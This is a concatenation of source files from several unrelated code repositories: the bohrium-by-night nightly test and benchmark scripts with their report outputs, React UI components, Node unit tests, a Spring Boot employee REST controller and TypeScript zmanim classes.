{/*<p className="text-sm text-gray-600 mb-6"><a className="text-purple-500 inline-flex items-center" href="#" onClick={() => { this.setState({ warnText: 'Planned for the future!', warnSnkOpen: true }) }}>Forgot password?</a></p>*/}
<button className="text-white bg-purple-500 border-0 py-2 px-8 focus:outline-none hover:bg-purple-600 rounded text-lg" onClick={this.handleSubmit}>
Open Sesame!
</button>
<p className="text-sm text-gray-600 mt-6">If you don't have an account yet,
<Link to="/signup"><a className="text-purple-500 inline-flex items-center" href="/signup">sign up here.</a></Link></p>
</div>
</div>
</section>
</main>
<footer className="text-gray-500 bg-gray-900 body-font">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
{/*<svg xmlns="http://www.w3.org/2000/svg" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-10 h-10 text-white p-2 bg-green-500 rounded-full" viewBox="0 0 24 24">
<path d="M12 2L2 7l10 5 10-5-10-5zM2 17l10 5 10-5M2 12l10 5 10-5"></path>
</svg>
<span className="ml-3 text-xl">Writer's Kalice</span>*/}
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none" d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z"></path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}
// //export default SignInPage;
export default Landing;<file_sep>import Chip from '@material-ui/core/Chip';
import React from 'react';
export default class InterestChip extends React.Component {
constructor(props) {
super(props);
this.state = {
on: false
};
this.handleClick = this.handleClick.bind(this);
}
handleClick() {
if (this.state.on) {
this.props.onOff();
this.setState(state => ({
on: false
}));
}
else {
this.props.onOn();
this.setState(state => ({
on: true
}));
}
}
render() {
return (
<div className="inline-block mb-3 mr-2"><Chip label={this.props.text} onClick={this.handleClick} variant={this.state.on ? 'default' : 'outline'} color="primary" /></div>
);
}
}
|
4d183b84fde511895493dacf08f59a8c4d6b2598
|
[
"JavaScript",
"Java",
"Markdown",
"SQL"
] | 22
|
Java
|
souris-dev/Writers-Kalice
|
02b0387ae0ae3f780587242212b25a8e560b7697
|
c61050be4e2776207e55ccd3e43fd348e8667e8f
|
refs/heads/master
|
<repo_name>bh107/bohrium-by-night<file_sep>/benchmark/raw_output/snakes_and_ladders-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Snakes and Ladders on Octuplets using NumPy/CPU
commit: `#<KEY> <https://bitbucket.org/bohrium/bohrium/commits/<KEY>>`_,
time: 2014-11-18 14:15:52.338679.
command: ``python benchmark/Python/snakes_and_ladders.py --size=1000*10 --bohrium=False``
Run 00
~~~~~~
stdout::
benchmark/Python/snakes_and_ladders.py - target: None, bohrium: False, size: 1000*10, elapsed-time: 4.595140
stderr::
N/A
<file_sep>/run_test.py
#!/usr/bin/env python
import subprocess
import argparse
import json
import sys
import os
import tempfile
def bash_cmd(cmd, cwd=None):
print cmd
p = subprocess.Popen(
cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
shell = True,
cwd=cwd
)
out, err = p.communicate()
print out,
print err,
def parser_bohrium_src(parser, path):
"""Check that 'path' points to the Bohrium source dir"""
path = os.path.expanduser(path)
if os.path.isdir(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not exist!"%path)
def parser_is_file(parser, path):
"""Check that 'path' points to a file"""
path = os.path.expanduser(path)
if os.path.isfile(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not point to a file!"%path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run the test suite and generate a rst-file.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'bohrium_src',
help='Path to the Bohrium source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'benchpress_src',
help='Path to the Benchpress source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'--ssh-key',
default="~/.ssh/bhbuilder_rsa",
help='The ssh key to use when accessing the git repos',
type=lambda x: parser_is_file(parser, x)
)
parser.add_argument(
'--no-slurm',
action="store_true",
help="Disable the use of SLURM -- the test runs locally"
)
args = parser.parse_args()
if args.no_slurm:
slurm = ''
else:
slurm = '--slurm'
tmpdir = tempfile.mkdtemp()
tmpdir_root = tmpdir
#Lets update the bohrium and benchpress repos
bash_cmd("git pull", cwd=args.bohrium_src)
bash_cmd("git pull", cwd=args.benchpress_src)
#We build and install bohrium in ~/.local
bash_cmd("mkdir -p build && cd build && cmake -DCMAKE_BUILD_TYPE=RelWithDebInfo .."\
" && make install", cwd=args.bohrium_src)
#First we run/submit the test suite
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; "\
"git clone <EMAIL>:bohrium/bohrium-by-night.git'", cwd=tmpdir)
tmpdir += "/bohrium-by-night" #move to the git repos
cmd = "./press.py %s suites/numpytest.py --no-perf --wait --runs 1 %s --publish-cmd='mv $OUT "\
"%s/test/numpytest.py.json'"%(args.bohrium_src, slurm, tmpdir)
bash_cmd(cmd, cwd=args.benchpress_src)
#Then we commit the result
bash_cmd("git add test/numpytest.py.json", cwd=tmpdir)
bash_cmd("git commit -m 'nightly-test'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#Finally we generate and commits the reStructuredText file
with open("%s/test/numpytest.py.json"%tmpdir, 'r') as f:
data = json.load(f)
meta = data['meta']
#Write header
rst = \
"""
Python Test Suite
=================
Running %s on Octuplets
commit: `#%s <https://bitbucket.org/bohrium/bohrium/commits/%s>`_,
time: %s.
"""%(meta['suite'], meta['rev'], meta['rev'], meta['started'])
#Write the runs
for r in data['runs']:
rst += "The %s results::\n\n"%r['engine_alias']
for o,e in zip(r['stdout'],r['stderr']):
o = o.replace("\n", "\n ")
e = e.replace("\n", "\n ")
rst += " %s\n %s\n"%(o,e)
print rst
with open("%s/test/numpytest.py.rst"%tmpdir,'w') as f:
f.write(rst)
bash_cmd("git add %s/test/numpytest.py.rst"%tmpdir, cwd=tmpdir)
bash_cmd("git commit -m 'nightly-test-rst'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
bash_cmd("rm -Rf %s"%tmpdir_root)
<file_sep>/benchmark/raw_output/jacobi_stencil-Bohrium-cpu.rst
Raw Benchmark Output
====================
Running Jacobi Stencil on Octuplets using Bohrium/CPU
commit: `#369b33555f0b3b<KEY>1843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:05:42.450102.
command: `` / u s r / b i n / t i m e - v - o / h o m e / b h b u i l d e r / b e n c h p r e s s / b h - j o b - f 4 a 0 9 a a 2 - a c c 3 - 4 2 b 0 - a b f f - 4 2 2 a e 3 3 8 4 c 2 c . s h - 2 . t i m e p y t h o n b e n c h m a r k / p y t h o n / j a c o b i _ s t e n c i l . p y - - s i z e = 3 0 0 0 * 3 0 0 0 * 1 0 0 - - b o h r i u m = T r u e``
Run 00
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 01
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 02
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
<file_sep>/benchmark/raw_output/convolve_2d-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Convolution 2D on Octuplets using NumPy/CPU
commit: `#<KEY> <https://bitbucket.org/bohrium/bohrium/commits/0e67b7b00f693b98b768cfc3d3c85c2370605c86>`_,
time: 2014-11-18 13:40:32.472579.
command: ``python benchmark/Python/convolve_2d.py --size=5 --bohrium=False``
Run 00
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/Python/convolve_2d.py", line 61, in <module>
main()
File "benchmark/Python/convolve_2d.py", line 52, in main
image, image_filter = convolve_2d_init(N)
File "benchmark/Python/convolve_2d.py", line 31, in convolve_2d_init
img = Image.open(photo)
File "/usr/lib/python2.7/dist-packages/PIL/Image.py", line 1996, in open
fp = builtins.open(fp, "rb")
IOError: [Errno 2] No such file or directory: '/tmp/Hell.jpg'
<file_sep>/run_benchmark.py
#!/usr/bin/env python
import subprocess
import argparse
import json
import sys
import os
import tempfile
def bash_cmd(cmd, cwd=None):
print cmd
p = subprocess.Popen(
cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
shell = True,
cwd=cwd
)
out, err = p.communicate()
print out,
print err,
def parser_bohrium_src(parser, path):
"""Check that 'path' points to the Bohrium source dir"""
path = os.path.expanduser(path)
if os.path.isdir(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not exist!"%path)
def parser_is_file(parser, path):
"""Check that 'path' points to a file"""
path = os.path.expanduser(path)
if os.path.isfile(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not point to a file!"%path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run the benchmark suite and generate a rst-file.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'bohrium_src',
help='Path to the Bohrium source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'benchpress_src',
help='Path to the Benchpress source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'--ssh-key',
default="~/.ssh/bhbuilder_rsa",
help='The ssh key to use when accessing the git repos',
type=lambda x: parser_is_file(parser, x)
)
parser.add_argument(
'--no-slurm',
action="store_true",
help="Disable the use of SLURM -- the benchmark runs locally"
)
args = parser.parse_args()
if args.no_slurm:
slurm = ''
else:
slurm = '--slurm'
tmpdir = tempfile.mkdtemp()
tmpdir_root = tmpdir
#Lets update the bohrium and benchpress repos
bash_cmd("git pull", cwd=args.bohrium_src)
bash_cmd("git pull", cwd=args.benchpress_src)
#We build and install bohrium in ~/.local
bash_cmd("mkdir -p build && cd build && cmake -DCMAKE_BUILD_TYPE=RelWithDebInfo .."\
" && make install", cwd=args.bohrium_src)
#We run/submit the benchmark suite
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; "\
"git clone <EMAIL>:bohrium/bohrium-by-night.git'", cwd=tmpdir)
tmpdir += "/bohrium-by-night" #move to the git repos
cmd = "./press.py %s suites/daily_benchmark.py --no-perf --wait --runs 3 %s --publish-cmd='mv $OUT "\
"%s/benchmark/daily.py.json'"%(args.bohrium_src, slurm, tmpdir)
print cmd
bash_cmd(cmd, cwd=args.benchpress_src)
#We commit the result
bash_cmd("git add benchmark/daily.py.json", cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#We generate and commit graphs
bash_cmd("./gen.graphs.py --type=daily %s/benchmark/daily.py.json "\
"--output %s/benchmark/gfx"%(tmpdir,tmpdir), cwd=args.benchpress_src)
bash_cmd("git add benchmark/gfx", cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark-gfx'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#We generate the raw output reStructuredText files
with open("%s/benchmark/daily.py.json"%tmpdir, 'r') as f:
data = json.load(f)
meta = data['meta']
#We write one rst-file per command
for script in set([d['script'] for d in data['runs']]):
for r in data['runs']:
if script == r['script']:
#Write header
rst = \
"""
Raw Benchmark Output
====================
Running %s on Octuplets using %s/%s
commit: `#%s <https://bitbucket.org/bohrium/bohrium/commits/%s>`_,
time: %s.
command: ``%s``
"""%(r['script_alias'], r['bridge_alias'], r['engine_alias'], meta['rev'],\
meta['rev'], meta['started'], ' '.join(r['cmd']))
#Write all outputs
i = 0
for o, e in zip(r['stdout'], r['stderr']):
if len(o) == 0:
o = "N/A"
if len(e) == 0:
e = "N/A"
rst += "Run %02d\n~~~~~~\n"%i
rst += " stdout::\n\n %s\n\n"%(o.replace("\n","\n "))
rst += " stderr::\n\n %s\n\n"%(e.replace("\n","\n "))
rst += "\n\n"
i += 1
filename = "%s/benchmark/raw_output/%s-%s-%s.rst"%(tmpdir,r['script'],\
r['bridge_alias'].replace(" ", "-"),r['engine'])
with open(filename,'w') as f:
f.write(rst)
bash_cmd("git add %s"%filename, cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark-raw-output'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#Finally we generate and commits the reStructuredText file
with open("%s/benchmark/daily.py.json"%tmpdir, 'r') as f:
data = json.load(f)
meta = data['meta']
#Write header
rst = \
"""
Python Benchmark Suite
======================
Running %s on Octuplets
commit: `#%s <https://bitbucket.org/bohrium/bohrium/commits/%s>`_,
time: %s.
"""%(meta['suite'], meta['rev'], meta['rev'], meta['started'])
#We handle one script at a time
for script in set([d['script'] for d in data['runs']]):
for r in data['runs']:
if script == r['script']:
#Write title
rst += "%s\n"%r['script_alias']
rst += "-"*len(r['script_alias']) + "\n\n"
break
#Write the executed commands
for r in data['runs']:
if script == r['script']:
rst += "`%s/%s <raw_output/%s-%s-%s.rst>`_:"%(r['bridge_alias'], \
r['engine_alias'], r['script'], \
r['bridge_alias'].replace(" ", "-"),r['engine'])
rst += " ``%s``\n\n"%(' '.join(r['cmd']))
rst += "\n\n"
#Write the graphs
rst += ".. image:: https://bytebucket.org/bohrium/bohrium-by-night"\
"/raw/master/benchmark/gfx/%s_runtime.png\n\n"%script
with open("%s/benchmark/daily.py.rst"%tmpdir,'w') as f:
f.write(rst)
bash_cmd("git add %s/benchmark/daily.py.rst"%tmpdir, cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark-rst'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
bash_cmd("rm -Rf %s"%tmpdir_root)
<file_sep>/benchmark/raw_output/convolve_3d-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Convolution 3D on Octuplets using NumPy/CPU
commit: `#369b33555f0b3b45fc0dde490cf2f7340b51843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:05:42.450102.
command: `` / u s r / b i n / t i m e - v - o / h o m e / b h b u i l d e r / b e n c h p r e s s / b h - j o b - c d c e 2 1 7 4 - 6 1 f 5 - 4 a 3 6 - 9 c 6 5 - 6 8 a 2 d 5 a d f 9 5 2 . s h - 2 . t i m e p y t h o n b e n c h m a r k / p y t h o n / c o n v o l v e _ 3 d . p y - - s i z e = 1 0 0 - - b o h r i u m = F a l s e``
Run 00
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/python/convolve_3d.py", line 59, in <module>
main()
File "benchmark/python/convolve_3d.py", line 50, in main
image, image_filter = convolve_3d_init(N, B)
File "benchmark/python/convolve_3d.py", line 33, in convolve_3d_init
kernel = gen_3d_filter(fsize, 13.0)
File "benchmark/python/convolve_3d.py", line 23, in gen_3d_filter
kernel[filterZ + kernelrad, filterY + kernelrad,filterX + kernelrad] = caleuler * np.exp(-distance)
IndexError: index 100 is out of bounds for axis 2 with size 100
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 01
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/python/convolve_3d.py", line 59, in <module>
main()
File "benchmark/python/convolve_3d.py", line 50, in main
image, image_filter = convolve_3d_init(N, B)
File "benchmark/python/convolve_3d.py", line 33, in convolve_3d_init
kernel = gen_3d_filter(fsize, 13.0)
File "benchmark/python/convolve_3d.py", line 23, in gen_3d_filter
kernel[filterZ + kernelrad, filterY + kernelrad,filterX + kernelrad] = caleuler * np.exp(-distance)
IndexError: index 100 is out of bounds for axis 2 with size 100
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 02
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/python/convolve_3d.py", line 59, in <module>
main()
File "benchmark/python/convolve_3d.py", line 50, in main
image, image_filter = convolve_3d_init(N, B)
File "benchmark/python/convolve_3d.py", line 33, in convolve_3d_init
kernel = gen_3d_filter(fsize, 13.0)
File "benchmark/python/convolve_3d.py", line 23, in gen_3d_filter
kernel[filterZ + kernelrad, filterY + kernelrad,filterX + kernelrad] = caleuler * np.exp(-distance)
IndexError: index 100 is out of bounds for axis 2 with size 100
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
<file_sep>/README.md
Find the result of the test suite run here: https://bitbucket.org/bohrium/bohrium-by-night/src/master/test/numpytest.py.rst
Find the result of the benchmark suite run here: https://bitbucket.org/bohrium/bohrium-by-night/src/master/benchmark/daily.py.rst<file_sep>/test/numpytest.py.rst
Python Test Suite
=================
Running suites/numpytest.py on Octuplets
commit: `#36<KEY>2f7340b<PASSWORD> <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:02:50.415690.
The CPU results::
python: can't open file 'test/numpy/numpytest.py': [Errno 2] No such file or directory
The GPU results::
python: can't open file 'test/numpy/numpytest.py': [Errno 2] No such file or directory
<file_sep>/benchmark/raw_output/mc-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Monte Carlo Pi on Octuplets using NumPy/CPU
commit: `#369b33555f0b3b45fc0dde490cf2f7340b51843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:05:42.450102.
command: `` / u s r / b i n / t i m e - v - o / h o m e / b h b u i l d e r / b e n c h p r e s s / b h - j o b - b 8 c 9 e 2 7 9 - 5 d 1 1 - 4 3 b c - b c e 0 - 0 7 3 1 e 8 6 c f 5 5 b . s h - 2 . t i m e p y t h o n b e n c h m a r k / p y t h o n / m c . p y - - s i z e = 1 0 0 0 0 0 0 0 * 1 0 0 - - b o h r i u m = F a l s e``
Run 00
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 01
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 02
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
|
69b3cd087c03f512574c5ad2ebc03f1a56df36b1
|
[
"Markdown",
"Python",
"reStructuredText"
] | 9
|
reStructuredText
|
bh107/bohrium-by-night
|
cd5fc8c7c68377b1c64a2a0c88b14b2869d1a34e
|
15d51fa966428aa375619716a34d95de6c0505aa
|
refs/heads/master
|
<repo_name>OSU-CS290-Sp18/node-basics<file_sep>/circumference.js
function circumference(r) {
return Math.PI * 2 * r;
}
module.exports = circumference;
<file_sep>/test.js
console.log("== Hello world");
process.argv.forEach(function (arg, i) {
console.log("== The " + i + "'th argument is:", arg);
});
console.log("== process.env.SOME_ENV_VARIABLE:", process.env.SOME_ENV_VARIABLE);
console.log("== __filename:", __filename);
console.log("== __dirname:", __dirname);
var fs = require('fs');
// fs.readFile(...);
var circumference = require('./circumference');
console.log("== circumference(5):", circumference(5));
console.log("== circumference(8):", circumference(8));
var circle = require('./lib/circle');
console.log("== circle.circumference(5):", circle.circumference(5));
console.log("== circle.area(5):", circle.area(5));
var figlet = require('figlet');
figlet("CS 290!!", function (err, data) {
if (!err) {
console.log(data);
}
});
<file_sep>/server.js
var http = require('http');
function requestHandler(req, res) {
console.log("== Got a request");
console.log(" -- method:", req.method);
console.log(" -- url:", req.url);
res.statusCode = 200;
res.setHeader('Content-Type', 'text/html');
if (req.url === '/style.css') {
res.write('body { font-family: Helvetica; }');
res.end();
} else {
res.write('<html>');
res.write('<head>');
res.write('<link rel="stylesheet" href="style.css">')
res.write('</head>');
res.write('<body>');
res.write('<h1>Hello world!!!!!!</h1>');
res.write('<p>You requested this URL:' + req.url + '</p>');
res.write('</body>');
res.write('</html>');
}
res.end();
}
var server = http.createServer(requestHandler);
server.listen(3001, function () {
console.log("== Server is listening on port 3001");
});
|
54ac25c24f3e9c74e6a6bd13269f47412bf9528b
|
[
"JavaScript"
] | 3
|
JavaScript
|
OSU-CS290-Sp18/node-basics
|
1a3a71de03819d42629d3912cb61e57c697b6089
|
e040af607aa8e9a1f0b9ea6cb3288b675aaf469b
|
refs/heads/master
|
<file_sep>#Wed Jan 20 10:23:59 IST 2021
org.eclipse.core.runtime=2
org.eclipse.platform=4.13.0.v20190916-1045
<file_sep>package net.javaguides.NGPTracker.repository;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;
import net.javaguides.NGPTracker.model.Employee;
@Repository
public interface EmployeeRepository extends JpaRepository<Employee, Long>{
public Employee findByEmailId(String email);
}
<file_sep>package net.javaguides.NGPTracker.controller;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.CrossOrigin;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
//import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import net.javaguides.NGPTracker.exceptions.ResourcesNotFoundException;
import net.javaguides.NGPTracker.model.Employee;
import net.javaguides.NGPTracker.repository.EmployeeRepository;
@RestController
@RequestMapping("/api/v1/")
//@RequestMapping(value = "/api/v1/", method = {RequestMethod.GET, RequestMethod.POST})
public class EmployeeController {
@Autowired
private EmployeeRepository employeeRepository;
//to find the email id exist or not
//get all list of employee
@CrossOrigin(origins="http://localhost:4200")
@GetMapping("/employees")
public List<Employee> getAllEmployees() {
return employeeRepository.findAll();
}
// create employee rest api
@CrossOrigin(origins="http://localhost:4200")
@PostMapping("/employees")
public Employee createEmployee(@RequestBody Employee employee) {
String tempEmailId = employee.getEmailId();
Employee employeeEmail = employeeRepository.findByEmailId(tempEmailId);
if(employeeEmail !=null) {
throw new ResourcesNotFoundException(" The emailid :"+ tempEmailId+" is already exist");
}
return employeeRepository.save(employee);
}
//get employee by id rest api
@CrossOrigin(origins="http://localhost:4200")
@GetMapping("/employees/{id}")
public ResponseEntity<Employee> getEmployeeById(@PathVariable Long id) {
Employee employee = employeeRepository.findById(id).orElseThrow(() -> new ResourcesNotFoundException("Employee not exist with id :"+ id));
return ResponseEntity.ok(employee);
}
//Update Rest api
@CrossOrigin(origins="http://localhost:4200")
@PutMapping("/employees/{id}")
public ResponseEntity<Employee> updateEmployee(@PathVariable Long id, @RequestBody Employee employeeDetails){
Employee employee = employeeRepository.findById(id).orElseThrow(() -> new ResourcesNotFoundException("Employee not exist with id :"+ id));
employee.setFirstName(employeeDetails.getFirstName());
employee.setLastName(employeeDetails.getLastName());
employee.setEmailId(employeeDetails.getEmailId());
Employee updatedEmployee = employeeRepository.save(employee);
return ResponseEntity.ok(updatedEmployee);
}
//Delete employee rest API
@DeleteMapping("/employees/{id}")
@CrossOrigin(origins="http://localhost:4200")
public ResponseEntity<Map<String, Boolean>> deleteEmployee(@PathVariable Long id){
Employee employee = employeeRepository.findById(id).orElseThrow(() -> new ResourcesNotFoundException("Employee not exist with id :"+ id));
employeeRepository.delete(employee);
Map<String, Boolean> response = new HashMap<>();
response.put("deleted", Boolean.TRUE);
return ResponseEntity.ok(response);
}
@PostMapping("/employees/login")
@CrossOrigin(origins="http://localhost:4200")
public Employee loginEmployee(@RequestBody Employee employee) {
String tempEmailId = employee.getEmailId();
Employee employeeEmail = employeeRepository.findByEmailId(tempEmailId);
if(employeeEmail !=null) {
return employeeRepository.findByEmailId(tempEmailId);
}
throw new ResourcesNotFoundException(" The emailid :"+ tempEmailId+" is doesn't exist");
}
}
|
d8d57c6ce932a2c806d860492de32462fee5106d
|
[
"Java",
"INI"
] | 3
|
INI
|
srayas/NGPTrackerBE
|
87f7d2d3b923d087f0786566fd68d331c199bba5
|
aff644a444875628d8b365056963ba2651fe345d
|
refs/heads/master
|
<repo_name>nadeemansaris524968/node-tests<file_sep>/utils/utils.test.js
const expect = require('expect');
const utils = require('./utils');
describe('Utils', () => {
describe('#add', () => {
it('should add two numbers', () => {
var result = utils.add(33, 11);
expect(result).toBe(44).toBeA('number');
});
});
it('should async add two numbers', (done) => {
utils.asyncAdd(4, 3, (sum) => {
expect(sum).toBe(7).toBeA('number');
done();
});
});
it('should square a number', (done) => {
utils.square(4, (squared) => {
expect(squared).toBe(16).toBeA('number');
done();
});
});
});
|
8d0057d75ef95e72ad3c1151d97ae6adfd871fbf
|
[
"JavaScript"
] | 1
|
JavaScript
|
nadeemansaris524968/node-tests
|
1ae9fd1236f755a1871eb8ea856fa1e82e1a046a
|
10ee7d9a1d59e110b14b127576d4ba80b3342542
|
refs/heads/master
|
<file_sep>import { DateTime } from 'luxon';
import { DateUtils, StringUtils, IntegerUtils } from '../polyfills/Utils';
/**
* Wrapper class for an astronomical time, mostly used to sort collections of
* astronomical times.
*
* @author © <NAME> 2007-2011
* @version 1.0
*/
export class Zman {
zmanLabel: string | null;
zman?: DateTime;
duration?: number;
zmanDescription?: Date;
constructor(date: DateTime, label: string | null)
constructor(duration: number, label: string | null)
constructor(dateOrDuration: number | DateTime, label: string | null) {
this.zmanLabel = label;
if (DateTime.isDateTime(dateOrDuration)) {
this.zman = dateOrDuration;
} else if (typeof dateOrDuration === 'number') {
this.duration = dateOrDuration;
}
}
static compareDateOrder(zman1: Zman, zman2: Zman): number {
if (!zman1.zman || !zman2.zman) {
throw new RangeError('zman cannot be falsy when comparing');
}
return DateUtils.compareTo(zman1.zman, zman2.zman);
}
static compareNameOrder(zman1: Zman, zman2: Zman): number {
return StringUtils.compareTo(zman1.zmanLabel || '', zman2.zmanLabel || '');
}
static compareDurationOrder(zman1: Zman, zman2: Zman): number {
if (!zman1.duration || !zman2.duration) {
throw new RangeError('Duration cannot be falsy when comparing');
}
return IntegerUtils.compare(zman1.duration, zman2.duration);
}
}
export type ZmanWithZmanDate = Zman & { zman: DateTime };
export type ZmanWithDuration = Zman & { duration: number };
<file_sep>/**
* An Object representing a Daf in the Daf Yomi cycle.
*
* @author © <NAME> 2011 - 2019
*/
export class Daf {
private masechtaNumber: number;
private daf: number;
private static readonly masechtosBavliTransliterated: string[] = ['Berachos', 'Shabbos', 'Eruvin', 'Pesachim', 'Shekalim',
'Yoma', 'Sukkah', 'Beitzah', '<NAME>', 'Taanis', 'Megillah', '<NAME>atan', 'Chagigah', 'Yevamos',
